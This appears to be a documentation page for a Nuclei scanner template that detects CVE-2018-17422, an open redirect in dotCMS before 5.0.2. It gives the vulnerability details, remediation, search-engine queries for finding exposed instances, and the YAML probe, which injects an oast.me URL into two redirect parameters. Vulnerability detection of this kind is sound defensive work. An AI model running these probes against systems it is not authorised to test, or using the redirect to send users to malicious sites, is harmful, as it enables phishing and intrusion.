DotCMS < 5.0.2 - Open Redirect
ID: CVE-2018-17422
Severity: medium
Author: 0x_Akoko,daffainfo
Tags: cve2018,cve,redirect,dotcms
Description
Section titled “Description”dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2018-17422
info: name: DotCMS < 5.0.2 - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. reference: - https://github.com/dotCMS/core/issues/15286 - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 epss-percentile: 0.45948 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: dotcms product: dotcms shodan-query: - http.title:"dotCMS" - http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms
http: - method: GET path: - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me' - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me'
stop-at-first-match: true matchers: - type: word part: body words: - "self.location = 'http://oast.me'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"# digest: 4a0a00473045022013889fb666ac025de6c7272f6eaa4770c0c1bbbeeb8671cf9ba281674ba78dda022100cdca1e51b667a81b1cbdb5651ca5388a7ced72d2004cb7dff60628cb323fb0aa:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-17422.yaml"